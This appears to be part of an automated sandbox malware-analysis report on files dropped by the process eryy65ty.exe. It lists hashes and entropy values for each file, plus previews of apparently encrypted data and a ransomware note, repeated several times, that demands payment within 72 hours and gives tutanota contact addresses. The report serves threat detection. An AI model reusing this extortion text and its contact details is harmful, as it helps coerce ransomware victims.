                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.853765622123025
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:SvOKiniJ4wa/oEhW+MO/YWKpd8UDiZ/NjQsoa0WYOHV4QhCG76x:NkJsoEM+MO/PKX8UDidNjQ3aPH+SCj
                                                                                                                                            MD5:1D174270CA48ED91CC9B402A2460E604
                                                                                                                                            SHA1:11920AF61551979C72841C6CDBD7B90CEAFC6E1B
                                                                                                                                            SHA-256:3AE3CAD107E7C949768DE39EA4E1CFE1E5EB7643363E9BED4A894E1C37503933
                                                                                                                                            SHA-512:725EE9C5CDE4E6EECC4C68658E2F375EAEFF411D97466EF0528F0D5B7AD1C5821C371EF409BA8F5A9280812EEEB895D49E174D8A6CEB05BCF678778EB871A6C2
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:C.....'.G|.....](.`:.L..V..H.as...{mQ.....|^P..<.g..T..._<..........}fp.$.%f..C......_.*$.....m.i...d....3..'.....o..-.X.P.d...0.w....,uk..@.....JM..c.....5..=.........X...a.X..\a................H...v<!.........n....D.F....<.^...|.t.D..mSx:..P...8.......T=..%.6 ,|$.}G.`.......O.g..J..{....t...cA.:.?....3:....$...3...D.l,.e.h.>..L...-..fC...'+..|p.R.n..?~n<.,..3+@.....[!?....?.o..F.Wc!.<D0.Er.'.....g..6.o...oT.Tc.poO.F/.......sq}#o....0..8o|S..qR.b.f%.&...U..|O.Y..K..N.5...M.....]........*.o..........!H.m.f.^......;..ap^t.C..|......M... e.fyl}...GT.M.&c.H...By...Lr.o'9=......Z.....W.....b...P].cMN...}.K$.,.?!.=..E.P_;V..{f.u....}...#0.7..^.i.p..:U{..G.j.[z.W.......*l.6.........^ ...9..db.W{z ....~Iq.7.s....iB.......p.....x!.J=..%Y.."..4P5..E(jRM..<...........$.{....W....j.YW.H*a...0...m.:.1..7....M..k...QQ..5.M.\g....5.t..[.(..V9.....]3:....,.O.v.....w.a....a.b...&./.!.y3.d.M.-x..0. O...#q...EYG.h..Z..3.....y.@.V.....r..c...l..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.853765622123025
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:SvOKiniJ4wa/oEhW+MO/YWKpd8UDiZ/NjQsoa0WYOHV4QhCG76x:NkJsoEM+MO/PKX8UDidNjQ3aPH+SCj
                                                                                                                                            MD5:1D174270CA48ED91CC9B402A2460E604
                                                                                                                                            SHA1:11920AF61551979C72841C6CDBD7B90CEAFC6E1B
                                                                                                                                            SHA-256:3AE3CAD107E7C949768DE39EA4E1CFE1E5EB7643363E9BED4A894E1C37503933
                                                                                                                                            SHA-512:725EE9C5CDE4E6EECC4C68658E2F375EAEFF411D97466EF0528F0D5B7AD1C5821C371EF409BA8F5A9280812EEEB895D49E174D8A6CEB05BCF678778EB871A6C2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:C.....'.G|.....](.`:.L..V..H.as...{mQ.....|^P..<.g..T..._<..........}fp.$.%f..C......_.*$.....m.i...d....3..'.....o..-.X.P.d...0.w....,uk..@.....JM..c.....5..=.........X...a.X..\a................H...v<!.........n....D.F....<.^...|.t.D..mSx:..P...8.......T=..%.6 ,|$.}G.`.......O.g..J..{....t...cA.:.?....3:....$...3...D.l,.e.h.>..L...-..fC...'+..|p.R.n..?~n<.,..3+@.....[!?....?.o..F.Wc!.<D0.Er.'.....g..6.o...oT.Tc.poO.F/.......sq}#o....0..8o|S..qR.b.f%.&...U..|O.Y..K..N.5...M.....]........*.o..........!H.m.f.^......;..ap^t.C..|......M... e.fyl}...GT.M.&c.H...By...Lr.o'9=......Z.....W.....b...P].cMN...}.K$.,.?!.=..E.P_;V..{f.u....}...#0.7..^.i.p..:U{..G.j.[z.W.......*l.6.........^ ...9..db.W{z ....~Iq.7.s....iB.......p.....x!.J=..%Y.."..4P5..E(jRM..<...........$.{....W....j.YW.H*a...0...m.:.1..7....M..k...QQ..5.M.\g....5.t..[.(..V9.....]3:....,.O.v.....w.a....a.b...&./.!.y3.d.M.-x..0. O...#q...EYG.h..Z..3.....y.@.V.....r..c...l..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.848114139818174
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:NnCrfhidLzWes+gghp01bDMmZDsGfyHZ9gv5DDlfITAQGIoSzJbt99e:NCLUNqp+gIEHMmZbfs96pluAQGIzFt9Y
                                                                                                                                            MD5:BA85E0F318A3624F99EEA188AF7D04B3
                                                                                                                                            SHA1:F313DE9B6F9AFDCB762B9C1E942C733F100DCB22
                                                                                                                                            SHA-256:E82D6C473549282A1B1FE8466D94146B8E21E3A420744CB096BDF1F4BE010237
                                                                                                                                            SHA-512:26229A3A92B3F2541F46A5B67EFCF2097AEE44F65771F972E60DF8AB2C030B4EA6507A3C20635E5140F7DE3E348D07FFD29EDD1C37E2EE509CC7097BD9754DE9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.^7o...e..B(.#.c....[..o.pV..R...,..[.&.{..=...h..;~+U..{ejR.m,..s}.@1.Te.0 ..&.....ix.}n.`f....p. O...5....l"..=..#....h).. ....6S.(B.'..R...M]..}...>h...}.2*.N`C..m.K.b.9.0d.R..B.....0..@../...0}c..:.wvM..1.d.(.@*Y.......,....jGN.._...Z. ....IJ&.a.)....K......P...%Wp.(......<K....+FBp...W.h.F...M...$.y.K.J@e.^.".}E...+..V...,.....O...AMA.#.=...*...N...Zdq..c..i..x.)i...Ma\D.\.h.2.,^CKq)..r......Hf.K .u.a...}.z...E...1X.....5@)a...I..]}..~q.:.......I& .}.7]vQ.yn{M.E..F..:`..B...%..i.Kd./..........y...^\.......V#....bO.K,...../..d...{......c.<.^.g...(.s..c.0.h..j............A.A}....^.!.P.JN....U<Y.Nn{..5A.5.3.Q.U..L..A..........H..8..*...Pf...8{..#..t...a.GH...o+-....L.1Q.Q...p..uA.B./A...+..`.d..P.U,.(._.N....,...."3I\$UXkX'9r..>.bo.N....S...-..".t#?..v.e....w.)..UA$..s.nx.g$..t?...m......'o..."..L}...zBZ-....[...z.....]..A9..i.V.D...S..=.tr.w.4.F...>zF.....Y....p3v..<^ ..`.(....U.......N.G..b2..*e.....r..T.W...}n5!.{.&.lg<7.;r.Zo2
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.848114139818174
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:NnCrfhidLzWes+gghp01bDMmZDsGfyHZ9gv5DDlfITAQGIoSzJbt99e:NCLUNqp+gIEHMmZbfs96pluAQGIzFt9Y
                                                                                                                                            MD5:BA85E0F318A3624F99EEA188AF7D04B3
                                                                                                                                            SHA1:F313DE9B6F9AFDCB762B9C1E942C733F100DCB22
                                                                                                                                            SHA-256:E82D6C473549282A1B1FE8466D94146B8E21E3A420744CB096BDF1F4BE010237
                                                                                                                                            SHA-512:26229A3A92B3F2541F46A5B67EFCF2097AEE44F65771F972E60DF8AB2C030B4EA6507A3C20635E5140F7DE3E348D07FFD29EDD1C37E2EE509CC7097BD9754DE9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.^7o...e..B(.#.c....[..o.pV..R...,..[.&.{..=...h..;~+U..{ejR.m,..s}.@1.Te.0 ..&.....ix.}n.`f....p. O...5....l"..=..#....h).. ....6S.(B.'..R...M]..}...>h...}.2*.N`C..m.K.b.9.0d.R..B.....0..@../...0}c..:.wvM..1.d.(.@*Y.......,....jGN.._...Z. ....IJ&.a.)....K......P...%Wp.(......<K....+FBp...W.h.F...M...$.y.K.J@e.^.".}E...+..V...,.....O...AMA.#.=...*...N...Zdq..c..i..x.)i...Ma\D.\.h.2.,^CKq)..r......Hf.K .u.a...}.z...E...1X.....5@)a...I..]}..~q.:.......I& .}.7]vQ.yn{M.E..F..:`..B...%..i.Kd./..........y...^\.......V#....bO.K,...../..d...{......c.<.^.g...(.s..c.0.h..j............A.A}....^.!.P.JN....U<Y.Nn{..5A.5.3.Q.U..L..A..........H..8..*...Pf...8{..#..t...a.GH...o+-....L.1Q.Q...p..uA.B./A...+..`.d..P.U,.(._.N....,...."3I\$UXkX'9r..>.bo.N....S...-..".t#?..v.e....w.)..UA$..s.nx.g$..t?...m......'o..."..L}...zBZ-....[...z.....]..A9..i.V.D...S..=.tr.w.4.F...>zF.....Y....p3v..<^ ..`.(....U.......N.G..b2..*e.....r..T.W...}n5!.{.&.lg<7.;r.Zo2
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.843439233812865
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:hYQxraLWKUJfmj3gZKXzX9QXNCSTs8H7WuYHemFiVnUM70lR/8JURU:hYvWKUM8KXzXeCeHE+VnUM7K8JUu
                                                                                                                                            MD5:BC2F49AF0355FEED2A70482B15CBBF38
                                                                                                                                            SHA1:D2AC7F801EEC5C4C063D44D713DF874731B9DC58
                                                                                                                                            SHA-256:7F5C690CB9FAF294B19351F5A3A08EEC5BCD1F03FCC57E642080604CCBEE6DC4
                                                                                                                                            SHA-512:8124656F50EAA5770E4015AD67FD934655646CF0A4F4E0E33898B159F94D05B2CD0FC6C593CC49A1EEF47F3F79DBCB3B0E8EF4ADD28EDE5A0B53A8EFBAE6C14F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:JYx..'.m...Q...-jF.]R..,.@X.......|...c...../..J......u.Z.u.p..8...w....8...&GOR-.mqso.8._.8I..m.r.u.n.M.;M.......~....PD.vV.n..s......g.F~.bd..v~&...D/.:..&W.=u;;..]..#..v....Pg6.b.b_.-..j.F....w.D.]u.?(......i.b...j...S.....`.ZQ...{...$.n...68\...X.3..sC..0.C~.S.R/.{.iE.n.M.q.3.V>._\.%n..G0..]yr....T.4N.............Pe.Z.&p5Hu...p..!......U9...&.Q..;UBI.....+.TS.p_.#^T&.C.tp...Jf1......kUH..|.?Ai..o....VO.x.....g..a...`.Z.G.!........|@...^........8..[.....r...\..' m.>..G...(..A....@.4j.p.A/.c.s.|...2....6....g..T6...bX'L.x.L".O.Q... &0'j...r.K~\....h.G.I....B'.xoP.a{6.H...O..%..w...t.0....+.6..8..l..S.^..\z.=.O..S.b.....D........3_....z..t...S.RpG..}n......}(N....,......m.7.%.g....mKi*....-.>:f...a...%y..9.q.....`.....|v.6~...8....vrR.}.6.L..S....p/..`*....Q..}.....[x...9.....M..Kk.............!`,.Q-...[.3..(9.n..'.Yj...((.........#..);...V.+E.7.+..H......t.....D..Yg.3..E..>...=..u..b9K5=;..a..H ..T...E....@u...M...)a.T...=6..Ua..tg....b....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.843439233812865
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:hYQxraLWKUJfmj3gZKXzX9QXNCSTs8H7WuYHemFiVnUM70lR/8JURU:hYvWKUM8KXzXeCeHE+VnUM7K8JUu
                                                                                                                                            MD5:BC2F49AF0355FEED2A70482B15CBBF38
                                                                                                                                            SHA1:D2AC7F801EEC5C4C063D44D713DF874731B9DC58
                                                                                                                                            SHA-256:7F5C690CB9FAF294B19351F5A3A08EEC5BCD1F03FCC57E642080604CCBEE6DC4
                                                                                                                                            SHA-512:8124656F50EAA5770E4015AD67FD934655646CF0A4F4E0E33898B159F94D05B2CD0FC6C593CC49A1EEF47F3F79DBCB3B0E8EF4ADD28EDE5A0B53A8EFBAE6C14F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:JYx..'.m...Q...-jF.]R..,.@X.......|...c...../..J......u.Z.u.p..8...w....8...&GOR-.mqso.8._.8I..m.r.u.n.M.;M.......~....PD.vV.n..s......g.F~.bd..v~&...D/.:..&W.=u;;..]..#..v....Pg6.b.b_.-..j.F....w.D.]u.?(......i.b...j...S.....`.ZQ...{...$.n...68\...X.3..sC..0.C~.S.R/.{.iE.n.M.q.3.V>._\.%n..G0..]yr....T.4N.............Pe.Z.&p5Hu...p..!......U9...&.Q..;UBI.....+.TS.p_.#^T&.C.tp...Jf1......kUH..|.?Ai..o....VO.x.....g..a...`.Z.G.!........|@...^........8..[.....r...\..' m.>..G...(..A....@.4j.p.A/.c.s.|...2....6....g..T6...bX'L.x.L".O.Q... &0'j...r.K~\....h.G.I....B'.xoP.a{6.H...O..%..w...t.0....+.6..8..l..S.^..\z.=.O..S.b.....D........3_....z..t...S.RpG..}n......}(N....,......m.7.%.g....mKi*....-.>:f...a...%y..9.q.....`.....|v.6~...8....vrR.}.6.L..S....p/..`*....Q..}.....[x...9.....M..Kk.............!`,.Q-...[.3..(9.n..'.Yj...((.........#..);...V.+E.7.+..H......t.....D..Yg.3..E..>...=..u..b9K5=;..a..H ..T...E....@u...M...)a.T...=6..Ua..tg....b....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.866646000854589
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:5XwkuJttnSAxxl/MSrcZfsRzTqkwlAKMtc3p7ZoNCJmQbY:GR/tjxxlBcZfITqkwnMe3ploeZY
                                                                                                                                            MD5:A0A8DFDF9DB9129B0DCB79A3F86AF241
                                                                                                                                            SHA1:ABE7299981692BF3708BCBDC882DF1CE3B997BAD
                                                                                                                                            SHA-256:5E1CDBF1EFBEEFD2963D5640966D597761C2D2DD5D29FCC58C98E13F13785862
                                                                                                                                            SHA-512:94D5DD8CD3B293FED736D667101A0C4B7369941CC1EDEABD83D0266534678A82478B3F3D9B8DF172EAD7D09A5A33FA5E6909E3633CD452F2C5D365C081DAD472
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....r.=.W"...M.4-+.".1....g...C..Rt]+.g;..#.3.wg*u...*m.Y...NP....n.../s....v.._.:.7...U[.d)..]a.zh...7.}Y...!.AJ".....6C......|...W.....sy...#!e.%.a.}W.......i%.9N.....j%_S......]8.....(S...k...5U[.N...k.[n1d:I_..q.......?>S.=.{D.J?D5.......YU...I..%..E.#..9..%......t.;..eQ..z....@&..=z.....pg....|h_.....~bU..*.L....QqlJ.e....*/.|..9.#..\...%fCNO.......l..#.{...&..f%...%.V~......q.t+.....Bk7.4....s.....?J.p..#~.aN..C..A.'3Qk?...pM..UL9....8...pw......t.m..t].wd....4....x.p.HM..a}x.@.Y..Z..x....}.....72.z,........h2..w.t..9....^,I.>]k.....<..G.R..'....#1......... .3..bV}..h....3.f.5..lL...H+..iH..o..F}...I.wW.."....k...h.'.h..M>..pQ....9 ..&T,cJ.#h4..#Kt.i..>......{.[....j.X...[."|..e}c.s.H.B..ER...(....H,....,..i.I...6..`.......%#!....T.......pF?3..M..0.H8r..y......"G..=.J.S...K..<.....oa(.$c.pX....xh..a..X......mD4.Ci..K.Zo1.....`...gj.at..^.T[._.m..u.uLk4/..u.`q..r.....'Y.4..tf.a.V.t..:.F.me...(...q.z`.........Raj.6........5X.G....Ug.X
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.866646000854589
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:5XwkuJttnSAxxl/MSrcZfsRzTqkwlAKMtc3p7ZoNCJmQbY:GR/tjxxlBcZfITqkwnMe3ploeZY
                                                                                                                                            MD5:A0A8DFDF9DB9129B0DCB79A3F86AF241
                                                                                                                                            SHA1:ABE7299981692BF3708BCBDC882DF1CE3B997BAD
                                                                                                                                            SHA-256:5E1CDBF1EFBEEFD2963D5640966D597761C2D2DD5D29FCC58C98E13F13785862
                                                                                                                                            SHA-512:94D5DD8CD3B293FED736D667101A0C4B7369941CC1EDEABD83D0266534678A82478B3F3D9B8DF172EAD7D09A5A33FA5E6909E3633CD452F2C5D365C081DAD472
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....r.=.W"...M.4-+.".1....g...C..Rt]+.g;..#.3.wg*u...*m.Y...NP....n.../s....v.._.:.7...U[.d)..]a.zh...7.}Y...!.AJ".....6C......|...W.....sy...#!e.%.a.}W.......i%.9N.....j%_S......]8.....(S...k...5U[.N...k.[n1d:I_..q.......?>S.=.{D.J?D5.......YU...I..%..E.#..9..%......t.;..eQ..z....@&..=z.....pg....|h_.....~bU..*.L....QqlJ.e....*/.|..9.#..\...%fCNO.......l..#.{...&..f%...%.V~......q.t+.....Bk7.4....s.....?J.p..#~.aN..C..A.'3Qk?...pM..UL9....8...pw......t.m..t].wd....4....x.p.HM..a}x.@.Y..Z..x....}.....72.z,........h2..w.t..9....^,I.>]k.....<..G.R..'....#1......... .3..bV}..h....3.f.5..lL...H+..iH..o..F}...I.wW.."....k...h.'.h..M>..pQ....9 ..&T,cJ.#h4..#Kt.i..>......{.[....j.X...[."|..e}c.s.H.B..ER...(....H,....,..i.I...6..`.......%#!....T.......pF?3..M..0.H8r..y......"G..=.J.S...K..<.....oa(.$c.pX....xh..a..X......mD4.Ci..K.Zo1.....`...gj.at..^.T[._.m..u.uLk4/..u.`q..r.....'Y.4..tf.a.V.t..:.F.me...(...q.z`.........Raj.6........5X.G....Ug.X
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.869040647561763
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:7MyYzex56DgEuVUA5VKiv4FJ4D+WY9dt05ZabM/cuZtK+eRXns/tPOCAYcqh:7dYzcPVUQXv4zgYMGbpCtCXny1OWco
                                                                                                                                            MD5:01756226F226A613C0BE2BBEFD9BFFAB
                                                                                                                                            SHA1:AEFB610A6F609C474B8EDC51708D715C989E4A2D
                                                                                                                                            SHA-256:86882C5D2AEF9054ED5DD31B292C4C1AD3DBDAB184F77D457A49A2FC5009719B
                                                                                                                                            SHA-512:0E64AE4AB57602C7798C0ABB232D69D80B9859142AA6EBD217EEDBDEFED1A1EE8339C3FBEA6D9B5B1DFF67AB68859004533D3E9F2BA3B086D25C616E623D3753
                                                                                                                                            Malicious:false
